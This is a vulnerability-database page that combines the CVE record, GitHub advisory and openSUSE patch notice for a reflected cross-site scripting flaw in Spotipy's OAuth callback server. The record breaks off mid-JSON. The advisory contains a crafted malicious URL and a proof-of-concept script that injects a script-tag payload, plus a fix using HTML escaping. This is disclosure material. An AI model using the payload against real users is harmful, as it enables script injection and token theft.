cvelistv5 - cve-2025-66040

CVE-2025-66040 (GCVE-0-2025-66040)

Vulnerability from cvelistv5 – Published: 2025-11-26 23:14 – Updated: 2025-11-28 15:25

Title

Spotipy has a XSS vulnerability in OAuth callback server

Summary

Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication. This issue has been patched in version 2.25.2.

Severity ?

3.6 (Low)


                        
                          CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/spotipy-dev/spotipy/security/a…	x_refsource_CONFIRM
	https://github.com/spotipy-dev/spotipy/commit/880…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	spotipy-dev	spotipy	Affected: < 2.25.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-66040",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-11-28T15:25:12.176179Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-11-28T15:25:40.139Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "spotipy",
          "vendor": "spotipy-dev",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.25.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user\u0027s browser during OAuth authentication. This issue has been patched in version 2.25.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 3.6,
            "baseSeverity": "LOW",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-11-26T23:14:44.795Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm"
        },
        {
          "name": "https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767"
        }
      ],
      "source": {
        "advisory": "GHSA-r77h-rpp9-w2xm",
        "discovery": "UNKNOWN"
      },
      "title": "Spotipy has a XSS vulnerability in OAuth callback server"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-66040",
    "datePublished": "2025-11-26T23:14:44.795Z",
    "dateReserved": "2025-11-21T01:08:02.615Z",
    "dateUpdated": "2025-11-28T15:25:40.139Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-66040\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-27T00:15:55.343\",\"lastModified\":\"2025-12-01T15:39:33.110\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user\u0027s browser during OAuth authentication. This issue has been patched in version 2.25.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\",\"baseScore\":3.6,\"baseSeverity\":\"LOW\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.0,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-66040\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-28T15:25:12.176179Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-28T15:25:26.909Z\"}}], \"cna\": {\"title\": \"Spotipy has a XSS vulnerability in OAuth callback server\", \"source\": {\"advisory\": \"GHSA-r77h-rpp9-w2xm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 3.6, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"spotipy-dev\", \"product\": \"spotipy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.25.2\"}]}], \"references\": [{\"url\": \"https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm\", \"name\": \"https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767\", \"name\": \"https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user\u0027s browser during OAuth authentication. This issue has been patched in version 2.25.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-26T23:14:44.795Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-66040\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-28T15:25:40.139Z\", \"dateReserved\": \"2025-11-21T01:08:02.615Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-26T23:14:44.795Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-R77H-RPP9-W2XM

Vulnerability from github – Published: 2025-12-01 19:07 – Updated: 2025-12-01 19:07

Summary

Spotipy has a XSS vulnerability in its OAuth callback server

Details

Summary

XSS vulnerability in OAuth callback server allows JavaScript injection through unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication.

Details

Vulnerable Code: spotipy/oauth2.py lines 1238-1274 (RequestHandler.do_GET)

The Problem: During OAuth flow, spotipy starts a local HTTP server to receive callbacks. The server reflects the error URL parameter directly into HTML without sanitization.

Vulnerable code at line 1255:

status = f"failed ({self.server.error})"

Then embedded in HTML at line 1265:

self._write(f"""<html>
<body>
<h1>Authentication status: {status}</h1>
</body>
</html>""")

The error parameter comes from URL parsing (lines 388-393) without HTML escaping, allowing script injection.

Attack Flow: 1. User starts OAuth authentication → local server runs on http://127.0.0.1:8080 2. Attacker crafts malicious URL: http://127.0.0.1:8080/?error=<script>alert(1)</script>&state=x 3. User visits URL → JavaScript executes in localhost origin

PoC

Simple Python Test:

#!/usr/bin/env python3
# poc_xss.py - Demonstrates XSS in spotipy OAuth callback

import requests
from spotipy.oauth2 import start_local_http_server
import threading
import time

# Start vulnerable server in background
def start_server():
    server = start_local_http_server(8080)
    server.handle_request()

thread = threading.Thread(target=start_server, daemon=True)
thread.start()
time.sleep(2)

# Send XSS payload
payload = '<script>alert("XSS")</script>'
url = f'http://127.0.0.1:8080/?error={payload}&state=test'

response = requests.get(url)
print(f"Status: {response.status_code}")
print(f"\nHTML Response:\n{response.text}")

# Check if vulnerable
if payload in response.text:
    print(f"\n[!] VULNERABLE: Payload '{payload}' reflected without escaping!")
else:
    print("\n[+] Safe: Payload was sanitized")

Run it:

pip install spotipy requests
python3 poc_xss.py

Output shows:

Status: 200
HTML Response:
<html>
<body>
<h1>Authentication status: failed (<script>alert("XSS")</script>)</h1>
</body>
</html>

[!] VULNERABLE: Payload '<script>alert("XSS")</script>' reflected without escaping!

The Proof: - Expected (safe): <script>alert("XSS")</script> - Actual (vulnerable): <script>alert("XSS")</script> - The script tags are NOT escaped → XSS confirmed

Impact

Vulnerability Type: Cross-Site Scripting (XSS) - CWE-79

Affected Users: Anyone using spotipy's OAuth flow with localhost redirect URIs

Attack Complexity: Medium-High - Requires timing (during brief OAuth window) - Localhost-only (127.0.0.1) - Requires user interaction (click malicious link)

Potential Impact: - Execute JavaScript in localhost origin - Access other localhost services (port scanning, API calls) - Steal data from local web applications - Extract OAuth tokens from browser storage - Bypass CSRF protections on localhost endpoints

CVSS 3.1 Score: 4.2 (Medium) - Attack Vector: Local - Attack Complexity: High - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Confidentiality/Integrity: Low

Recommended Fix:

import html

# Line 1255 - apply HTML escaping
if self.server.error:
    status = f"failed ({html.escape(str(self.server.error))})"

Severity ?

3.6 (Low)


                  
                    CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "spotipy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.25.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-66040"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-01T19:07:26Z",
    "nvd_published_at": "2025-11-27T00:15:55Z",
    "severity": "LOW"
  },
  "details": "### Summary\nXSS vulnerability in OAuth callback server allows JavaScript injection through unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user\u0027s browser during OAuth authentication.\n\n\n### Details\n**Vulnerable Code:** `spotipy/oauth2.py` lines 1238-1274 (RequestHandler.do_GET)\n\n**The Problem:**\nDuring OAuth flow, spotipy starts a local HTTP server to receive callbacks. The server reflects the `error` URL parameter directly into HTML without sanitization.\n\n**Vulnerable code at line 1255:**\n```python\nstatus = f\"failed ({self.server.error})\"\n```\n\n**Then embedded in HTML at line 1265:**\n```python\nself._write(f\"\"\"\u003chtml\u003e\n\u003cbody\u003e\n\u003ch1\u003eAuthentication status: {status}\u003c/h1\u003e\n\u003c/body\u003e\n\u003c/html\u003e\"\"\")\n```\n\nThe `error` parameter comes from URL parsing (lines 388-393) without HTML escaping, allowing script injection.\n\n**Attack Flow:**\n1. User starts OAuth authentication \u2192 local server runs on `http://127.0.0.1:8080`\n2. Attacker crafts malicious URL: `http://127.0.0.1:8080/?error=\u003cscript\u003ealert(1)\u003c/script\u003e\u0026state=x`\n3. User visits URL \u2192 JavaScript executes in localhost origin\n\n\n### PoC\n\n**Simple Python Test:**\n```python\n#!/usr/bin/env python3\n# poc_xss.py - Demonstrates XSS in spotipy OAuth callback\n\nimport requests\nfrom spotipy.oauth2 import start_local_http_server\nimport threading\nimport time\n\n# Start vulnerable server in background\ndef start_server():\n    server = start_local_http_server(8080)\n    server.handle_request()\n\nthread = threading.Thread(target=start_server, daemon=True)\nthread.start()\ntime.sleep(2)\n\n# Send XSS payload\npayload = \u0027\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e\u0027\nurl = f\u0027http://127.0.0.1:8080/?error={payload}\u0026state=test\u0027\n\nresponse = requests.get(url)\nprint(f\"Status: {response.status_code}\")\nprint(f\"\\nHTML Response:\\n{response.text}\")\n\n# Check if vulnerable\nif payload in response.text:\n    print(f\"\\n[!] VULNERABLE: Payload \u0027{payload}\u0027 reflected without escaping!\")\nelse:\n    print(\"\\n[+] Safe: Payload was sanitized\")\n```\n\n**Run it:**\n```bash\npip install spotipy requests\npython3 poc_xss.py\n```\n\n**Output shows:**\n```\nStatus: 200\nHTML Response:\n\u003chtml\u003e\n\u003cbody\u003e\n\u003ch1\u003eAuthentication status: failed (\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e)\u003c/h1\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\n[!] VULNERABLE: Payload \u0027\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e\u0027 reflected without escaping!\n```\n\n**The Proof:**\n- Expected (safe): `\u0026lt;script\u0026gt;alert(\"XSS\")\u0026lt;/script\u0026gt;`\n- Actual (vulnerable): `\u003cscript\u003ealert(\"XSS\")\u003c/script\u003e`\n- The script tags are NOT escaped \u2192 XSS confirmed\n\n### Impact\n\n**Vulnerability Type:** Cross-Site Scripting (XSS) - CWE-79\n\n**Affected Users:** Anyone using spotipy\u0027s OAuth flow with localhost redirect URIs\n\n**Attack Complexity:** Medium-High\n- Requires timing (during brief OAuth window)\n- Localhost-only (127.0.0.1)\n- Requires user interaction (click malicious link)\n\n**Potential Impact:**\n- Execute JavaScript in localhost origin\n- Access other localhost services (port scanning, API calls)\n- Steal data from local web applications\n- Extract OAuth tokens from browser storage\n- Bypass CSRF protections on localhost endpoints\n\n**CVSS 3.1 Score:** 4.2 (Medium)\n- Attack Vector: Local\n- Attack Complexity: High\n- Privileges Required: None\n- User Interaction: Required\n- Scope: Unchanged\n- Confidentiality/Integrity: Low\n\n\n**Recommended Fix:**\n```python\nimport html\n\n# Line 1255 - apply HTML escaping\nif self.server.error:\n    status = f\"failed ({html.escape(str(self.server.error))})\"\n```",
  "id": "GHSA-r77h-rpp9-w2xm",
  "modified": "2025-12-01T19:07:26Z",
  "published": "2025-12-01T19:07:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66040"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/spotipy-dev/spotipy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Spotipy has a XSS vulnerability in its OAuth callback server"
}

OPENSUSE-SU-2025:15777-1

Vulnerability from csaf_opensuse - Published: 2025-11-27 00:00 - Updated: 2025-11-27 00:00

Summary

python311-spotipy-2.25.2-1.1 on GA media

Notes

Title of the patch

python311-spotipy-2.25.2-1.1 on GA media

Description of the patch

These are all security issues fixed in the python311-spotipy-2.25.2-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2025-15777

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python311-spotipy-2.25.2-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python311-spotipy-2.25.2-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-15777",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15777-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-66040 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-66040/"
      }
    ],
    "title": "python311-spotipy-2.25.2-1.1 on GA media",
    "tracking": {
      "current_release_date": "2025-11-27T00:00:00Z",
      "generator": {
        "date": "2025-11-27T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:15777-1",
      "initial_release_date": "2025-11-27T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-11-27T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-spotipy-2.25.2-1.1.aarch64",
                "product": {
                  "name": "python311-spotipy-2.25.2-1.1.aarch64",
                  "product_id": "python311-spotipy-2.25.2-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-spotipy-2.25.2-1.1.aarch64",
                "product": {
                  "name": "python312-spotipy-2.25.2-1.1.aarch64",
                  "product_id": "python312-spotipy-2.25.2-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-spotipy-2.25.2-1.1.aarch64",
                "product": {
                  "name": "python313-spotipy-2.25.2-1.1.aarch64",
                  "product_id": "python313-spotipy-2.25.2-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-spotipy-2.25.2-1.1.ppc64le",
                "product": {
                  "name": "python311-spotipy-2.25.2-1.1.ppc64le",
                  "product_id": "python311-spotipy-2.25.2-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python312-spotipy-2.25.2-1.1.ppc64le",
                "product": {
                  "name": "python312-spotipy-2.25.2-1.1.ppc64le",
                  "product_id": "python312-spotipy-2.25.2-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python313-spotipy-2.25.2-1.1.ppc64le",
                "product": {
                  "name": "python313-spotipy-2.25.2-1.1.ppc64le",
                  "product_id": "python313-spotipy-2.25.2-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-spotipy-2.25.2-1.1.s390x",
                "product": {
                  "name": "python311-spotipy-2.25.2-1.1.s390x",
                  "product_id": "python311-spotipy-2.25.2-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python312-spotipy-2.25.2-1.1.s390x",
                "product": {
                  "name": "python312-spotipy-2.25.2-1.1.s390x",
                  "product_id": "python312-spotipy-2.25.2-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-spotipy-2.25.2-1.1.s390x",
                "product": {
                  "name": "python313-spotipy-2.25.2-1.1.s390x",
                  "product_id": "python313-spotipy-2.25.2-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-spotipy-2.25.2-1.1.x86_64",
                "product": {
                  "name": "python311-spotipy-2.25.2-1.1.x86_64",
                  "product_id": "python311-spotipy-2.25.2-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-spotipy-2.25.2-1.1.x86_64",
                "product": {
                  "name": "python312-spotipy-2.25.2-1.1.x86_64",
                  "product_id": "python312-spotipy-2.25.2-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-spotipy-2.25.2-1.1.x86_64",
                "product": {
                  "name": "python313-spotipy-2.25.2-1.1.x86_64",
                  "product_id": "python313-spotipy-2.25.2-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-spotipy-2.25.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.aarch64"
        },
        "product_reference": "python311-spotipy-2.25.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-spotipy-2.25.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.ppc64le"
        },
        "product_reference": "python311-spotipy-2.25.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-spotipy-2.25.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.s390x"
        },
        "product_reference": "python311-spotipy-2.25.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-spotipy-2.25.2-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.x86_64"
        },
        "product_reference": "python311-spotipy-2.25.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-spotipy-2.25.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.aarch64"
        },
        "product_reference": "python312-spotipy-2.25.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-spotipy-2.25.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.ppc64le"
        },
        "product_reference": "python312-spotipy-2.25.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-spotipy-2.25.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.s390x"
        },
        "product_reference": "python312-spotipy-2.25.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-spotipy-2.25.2-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.x86_64"
        },
        "product_reference": "python312-spotipy-2.25.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-spotipy-2.25.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.aarch64"
        },
        "product_reference": "python313-spotipy-2.25.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-spotipy-2.25.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.ppc64le"
        },
        "product_reference": "python313-spotipy-2.25.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-spotipy-2.25.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.s390x"
        },
        "product_reference": "python313-spotipy-2.25.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-spotipy-2.25.2-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.x86_64"
        },
        "product_reference": "python313-spotipy-2.25.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-66040",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-66040"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user\u0027s browser during OAuth authentication. This issue has been patched in version 2.25.2.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.aarch64",
          "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.s390x",
          "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.x86_64",
          "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.aarch64",
          "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.ppc64le",
          "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.s390x",
          "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.x86_64",
          "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.aarch64",
          "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.s390x",
          "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-66040",
          "url": "https://www.suse.com/security/cve/CVE-2025-66040"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1254285 for CVE-2025-66040",
          "url": "https://bugzilla.suse.com/1254285"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
